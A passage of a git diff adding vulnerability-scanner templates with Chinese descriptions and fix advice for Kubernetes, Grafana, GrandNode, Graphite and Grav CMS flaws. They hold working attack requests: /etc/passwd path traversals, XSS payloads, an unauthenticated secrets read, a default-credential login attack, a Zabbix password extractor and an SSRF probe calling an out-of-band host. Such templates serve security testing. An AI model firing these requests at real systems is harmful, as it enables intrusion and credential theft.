1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 + ``` +requests: +- matchers: + - type: dsl + dsl: + - status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "") + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy; + req-condition: true diff --git a/config/51pwn/yaml/Google Kubernetes/CVE-2018-18264.yaml b/config/51pwn/yaml/Google Kubernetes/CVE-2018-18264.yaml new file mode 100755 index 000000000..d91972bfe --- /dev/null +++ b/config/51pwn/yaml/Google Kubernetes/CVE-2018-18264.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-18264 +info: + name: Kubernetes Dashboard unauthenticated secret access + author: + - l0ne1y + description: |- + Kubernetes Dashboard身份验证绕过漏洞 + Google Kubernetes是美国Google公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。Kubernetes Dashboard是一款基于Web的用于管理Kubernetes集群的通用界面。 + + Google Kubernetes Dashboard 1.10.1之前版本中存在安全漏洞。攻击者可利用该漏洞绕过身份验证,使用Dashboard的服务账户读取信息。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/kubernetes/dashboard/releases/ +requests: +- matchers: + - type: status + status: + - 200 + - type: dsl + dsl: + - contains(body, "apiVersion") && contains(body, "objectRef") + matchers-condition: and + path: + - '{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs' + - '{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Google Kubernetes/CVE-2019-11248.yaml b/config/51pwn/yaml/Google Kubernetes/CVE-2019-11248.yaml new file mode 100755 index 000000000..e0542e784 --- /dev/null +++ b/config/51pwn/yaml/Google Kubernetes/CVE-2019-11248.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-11248 +info: + name: exposed_pprof + author: + - l0ne1y + description: |- + Kubelet /debug/pprof 信息泄漏漏洞 + Google Kubernetes是美国谷歌(Google)公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。Kubelet 是 Kubernetes 的核心组件之一。 + 默认情况下,Kubelet 的 healthz 节在10248端口对外开放且无身份验证,但仅限于 localhost 。如果该节点使用非本地的 healthzBindAddress (--health-bind-address) 和旧版本,则存在信息泄露的风险。1.15.0、1.14.4、1.13.8 和 1.12.10 之前的版本会受到影响。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/kubernetes/kubernetes/issues/81023 + + 临时修复方案: + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 + 7、更新节点配置将“healthzBindAddress”设置为“127.0.0.1” +requests: +- matchers: + - type: word + condition: or + words: + - 'Types of profiles available:' + - Profile Descriptions + - 'goroutine profile: total' + path: + - '{{BaseURL}}/debug/pprof/' + - '{{BaseURL}}/debug/pprof/goroutine?debug=1' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Google Kubernetes/kubernetes-kustomization-disclosure.yaml b/config/51pwn/yaml/Google Kubernetes/kubernetes-kustomization-disclosure.yaml new file mode 100755 index 000000000..8085b24be --- /dev/null +++ b/config/51pwn/yaml/Google Kubernetes/kubernetes-kustomization-disclosure.yaml @@ -0,0 +1,39 @@ +id: kubernetes-kustomization-disclosure +info: + name: Kubernetes Kustomization Disclosure + author: + - l0ne1y + description: |- + Kubernetes Kustomization 信息泄露 + + Google Kubernetes是美国谷歌(Google)公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。Kubelet 是 Kubernetes 的核心组件之一。 + /kustomization.yml文件会泄露apiVersion等信息 + severity: low + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/kubernetes/dashboard/releases/ + + 临时修复方案: + 1、去除页面泄露的信息 +requests: +- matchers: + - type: word + condition: or + part: body + words: + - 'apiVersion:' + - 'resources:' + - 'namespace:' + - 'commonLabels:' + - Kustomization + - type: dsl + dsl: + - contains(tolower(all_headers), 'application/yaml') + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/kustomization.yml' + method: GET diff --git a/config/51pwn/yaml/Google Kubernetes/kubernetes-pods-api.yaml b/config/51pwn/yaml/Google Kubernetes/kubernetes-pods-api.yaml new file mode 100755 index 000000000..795e2b98e --- /dev/null +++ b/config/51pwn/yaml/Google Kubernetes/kubernetes-pods-api.yaml @@ -0,0 +1,35 @@ +id: kubernetes-pods-api +info: + name: Kubernetes Pods - API Discovery & Remote Code Execution + author: + - l0ne1y + description: |- + Kubernetes Pods - API接口泄露&命令执行漏洞 + Google Kubernetes是美国Google公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。Kubernetes Dashboard是一款基于Web的用于管理Kubernetes集群的通用界面。 + Kubernetes pod接口可能泄露关键数据和密码等信息,进一步利用可执行命令 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/kubernetes/dashboard/releases/ + + 临时修复方案: + 1、调用pod功能前验证用户是否有权限调用相关功能。 + 2、校验用户提交的参数内容。 +requests: +- matchers: + - type: word + words: + - apiVersion + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pods' + - '{{BaseURL}}/api/v1/pods' + method: GET diff --git a/config/51pwn/yaml/Grafana/CVE-2020-11110.yaml b/config/51pwn/yaml/Grafana/CVE-2020-11110.yaml new file mode 100755 index 000000000..1298ab44b --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2020-11110.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-11110 +info: + name: Grafana Unauthenticated Stored XSS + author: + - l0ne1y + description: |- + Grafana 跨站脚本漏洞 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + + Grafana 6.7.1及之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/grafana/grafana/blob/master/CHANGELOG.md + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - '"deleteKey":' + - '"deleteUrl":' + matchers-condition: and + raw: + - | + POST /api/snapshots HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + content-type: application/json + Connection: close + + {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} diff --git a/config/51pwn/yaml/Grafana/CVE-2021-27358.yaml b/config/51pwn/yaml/Grafana/CVE-2021-27358.yaml new file mode 100755 index 000000000..727a4e1c9 --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2021-27358.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-27358 +info: + name: Grafana Unauthenticated Snapshot Creation + author: + - l0ne1y + description: |- + Grafana拒绝服务漏洞 + + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + + Grafana before 7.4.1 存在安全漏洞,该漏洞允许未经身份验证的远程攻击者通过远程API调用触发拒绝服务。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/grafana/grafana/blob/master/CHANGELOG.md +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"deleteUrl":' + - '"deleteKey":' + - type: word + part: header + words: + - application/json + matchers-condition: and + raw: + - | + POST /api/snapshots HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} diff --git a/config/51pwn/yaml/Grafana/CVE-2021-39226.yaml b/config/51pwn/yaml/Grafana/CVE-2021-39226.yaml new file mode 100755 index 000000000..20f354dec --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2021-39226.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-39226 +info: + name: Grafana Snapshot - Authentication Bypass + author: + - l0ne1y + description: |- + Grafana 授权问题漏洞 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + Grafana 存在授权问题漏洞,该漏洞源于在受影响的版本中,未经身份验证和身份验证的用户都可以通过访问路径:/dashboard/snapshot/:key或/api/snapshot/:key来查看具有最低数据库键的快照。如果快照\"公共模式\"配置设置为true(而默认为false),未经身份验证的用户可以通过访问路径:/api/snapshot-delete:/deleteKey来删除快照,并使用最低的数据库键。无论快照的“公共模式”设置如何,通过身份验证的用户都可以删除快照. + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9 + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '"isSnapshot":true' + matchers-condition: and + path: + - '{{BaseURL}}/api/snapshots/:key' + method: GET diff --git a/config/51pwn/yaml/Grafana/CVE-2021-41174.yaml b/config/51pwn/yaml/Grafana/CVE-2021-41174.yaml new file mode 100755 index 000000000..6aeb4693b --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2021-41174.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-41174 +info: + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting + author: + - l0ne1y + description: |- + Grafana 跨站脚本漏洞 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + + Grafana 存在跨站脚本漏洞,该漏洞源于没有对 URL 进行验证,导致 AngularJS 渲染引擎执行 URL 中包含的 JavaScript 表达式。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - Grafana + - frontend_boot_js_done_time_seconds + - type: regex + regex: + - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' + matchers-condition: and + path: + - '{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1' + method: GET + skip-variables-check: true diff --git a/config/51pwn/yaml/Grafana/CVE-2021-43798.yaml b/config/51pwn/yaml/Grafana/CVE-2021-43798.yaml new file mode 100755 index 000000000..4b2c19a44 --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2021-43798.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-43798 +info: + name: Grafana v8.x Arbitrary File Read + author: + - l0ne1y + description: |- + Grafana plugin 任意文件读取漏洞 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + + Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞,攻击者可利用该漏洞执行目录遍历攻击,访问本地文件。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Grafana/CVE-2022-26148.yaml b/config/51pwn/yaml/Grafana/CVE-2022-26148.yaml new file mode 100755 index 000000000..93c49b94f --- /dev/null +++ b/config/51pwn/yaml/Grafana/CVE-2022-26148.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-26148 +info: + name: Grafana & Zabbix Integration - Credential Disclosure + author: + - l0ne1y + description: |- + Grafana 敏感数据的明文存储 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + + Grafana 7.3.4版本及之前版本存在安全漏洞,该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时,Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时,可以右键查看源码,使用Ctrl-F在api_jsonrpc.php中搜索password,可以发现Zabbix的账号密码和URL地址。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://grafana.com/grafana/download + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: regex + condition: and + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + - type: word + condition: or + part: body + words: + - '"zabbix":' + - '"zbx":' + - alexanderzobnin-zabbix-datasource + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' + group: 1 + matchers-condition: and + path: + - '{{BaseURL}}/login?redirect=%2F' + method: GET diff --git a/config/51pwn/yaml/Grafana/grafana-default-login.yaml b/config/51pwn/yaml/Grafana/grafana-default-login.yaml new file mode 100755 index 000000000..e9655cfb4 --- /dev/null +++ b/config/51pwn/yaml/Grafana/grafana-default-login.yaml @@ -0,0 +1,49 @@ +id: grafana-default-login +info: + name: Grafana Default Login + author: + - l0ne1y + description: |- + Grafana 默认账号密码 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + Grafana存在默认账户密码,管理员在系统安装后未对账号密码进行安全修改。 + severity: high + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + part: header + words: + - grafana_session + - type: word + part: body + words: + - Logged in + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + content-type: application/json + + {"user":"{{username}}","password":"{{password}}"} + attack: pitchfork + payloads: + password: + - prom-operator + - admin + username: + - admin + - admin diff --git a/config/51pwn/yaml/Grafana/grafana-public-signup.yaml b/config/51pwn/yaml/Grafana/grafana-public-signup.yaml new file mode 100755 index 000000000..8c1b09228 --- /dev/null +++ b/config/51pwn/yaml/Grafana/grafana-public-signup.yaml @@ -0,0 +1,41 @@ +id: grafana-public-signup +info: + name: Grafana Public Signup + author: + - l0ne1y + description: |- + Grafana Public 默认账号密码 + Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 + Grafana存在API插件注册默认账户密码,管理员在系统安装后未对账号密码进行安全修改。 + severity: medium + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + words: + - User sign up completed successfully + - type: word + condition: and + part: header + words: + - grafana_sess + - grafana_user + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /api/user/signup/step2 HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"} diff --git a/config/51pwn/yaml/GrandNode/CVE-2019-12276.yaml b/config/51pwn/yaml/GrandNode/CVE-2019-12276.yaml new file mode 100755 index 000000000..aa55ed8aa --- /dev/null +++ b/config/51pwn/yaml/GrandNode/CVE-2019-12276.yaml @@ -0,0 +1,46 @@ +id: CVE-2019-12276 +info: + name: GrandNode 4.40 - Path Traversal + author: + - daffainfo + tags: + - cve + - cve2019 + - lfi + description: |2- + GrandNode 路径遍历漏洞 + GrandNode是一套基于ASP.NET CORE和MongoDB的、跨平台的开源电子商务解决方案。 + + GrandNode 4.40版本中的LetsEncryptController的Controllers/LetsEncryptController.cs存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + reference: + - https://security401.com/grandnode-path-traversal/ + - https://www.cvedetails.com/cve/cve-2019-12276 + - https://grandnode.com + - /~https://github.com/grandnode/grandnode + severity: high + classification: + cve-id: + - cve-2019-12276 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:https://grandnode.com/\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd' + method: GET + headers: + Connection: close diff --git a/config/51pwn/yaml/Graphite/CVE-2017-18638.yaml b/config/51pwn/yaml/Graphite/CVE-2017-18638.yaml new file mode 100755 index 000000000..0f64765ab --- /dev/null +++ b/config/51pwn/yaml/Graphite/CVE-2017-18638.yaml @@ -0,0 +1,22 @@ +id: CVE-2017-18638 +info: + name: Graphite 'graphite.composer.views.send_email' SSRF + author: + - l0ne1y + description: "Graphite 代码执行漏洞\n Graphite是一款基于Django的Web应用程序。该程序主要用于绘制图形和仪表板。\n\nGraphite + 1.1.5及之前版本中的send_email in graphite-web/webapp/graphite/composer/views.py文件存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + /~https://github.com/graphite-project/graphite-web/pull/2499 + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + method: GET diff --git a/config/51pwn/yaml/Grav CMS/CVE-2018-5233.yaml b/config/51pwn/yaml/Grav CMS/CVE-2018-5233.yaml new file mode 100755 index 000000000..3ae8109c2 --- /dev/null +++ b/config/51pwn/yaml/Grav CMS/CVE-2018-5233.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5233 +info: + name: Grav CMS before 1.3.0 allows XSS. + author: + - l0ne1y + description: "Grav CMS 跨站脚本漏洞 \n Grav CMS是一套可扩展的用于个人博客、小型内容发布平台和单页产品展示的CMS(内容管理系统)。\n\nGrav + CMS 1.3.0版本中的system/src/Grav/Common/Twig/Twig.php文件存在跨站脚本漏洞。远程攻击者可通过向admin/tools发送PATH_INFO利用该漏洞注入任意的Web脚本或HTML。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + /~https://github.com/ceph/ceph/pull/20488 + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Grav CMS/CVE-2020-11529.yaml b/config/51pwn/yaml/Grav CMS/CVE-2020-11529.yaml new file mode 100755 index 000000000..9ceccf8a3 --- /dev/null +++ b/config/51pwn/yaml/Grav CMS/CVE-2020-11529.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-11529 +info: + name: Grav <1.7 - Open Redirect + author: + - 0x_akoko + tags: + - cve + - cve2019 + - redirect + - grav + - getgrav + description: |- + Grav 输入验证错误漏洞 + Grav是一套可扩展的用于个人博客、小型内容发布平台和单页产品展示的CMS(内容管理系统)。 + + Grav 1.6.23之前版本中的Common/Grav.php文件存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。 + reference: + - /~https://github.com/getgrav/grav/issues/3134 + - https://www.cvedetails.com/cve/cve-2020-11529 + - https://nvd.nist.gov/vuln/detail/cve-2020-11529 + - /~https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7 + severity: medium + classification: + cve-id: + - cve-2020-11529 + cwe-id: + - cwe-601 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7 + + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$ + path: + - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' + method: GET diff --git a/config/51pwn/yaml/Gridx/CVE-2020-19625.yaml b/config/51pwn/yaml/Gridx/CVE-2020-19625.yaml new file mode 100755 index 000000000..6f8e2672d --- /dev/null +++ b/config/51pwn/yaml/Gridx/CVE-2020-19625.yaml @@ -0,0 +1,53 @@ +id: CVE-2020-19625 +info: + name: Gridx 1.3 - Remote Code Execution + author: + - geeknik + tags: + - cve + - cve2020 + - gridx + - rce + description: |2 + gridx 任意命令执行 + oria gridx 1.3 中的 tests/support/stores/test_grid_filter.php 中的远程代码执行漏洞允许远程攻击者通过 $query 参数的特制值执行任意代码。 + reference: + - /~https://github.com/oria/gridx/issues/433 + - https://nvd.nist.gov/vuln/detail/cve-2020-19625 + - http://mayoterry.com/file/cve/remote_code_execution_vulnerability_in_gridx_latest_version.pdf + severity: critical + classification: + cve-id: + - cve-2020-19625 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/oria/gridx/issues/433 + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 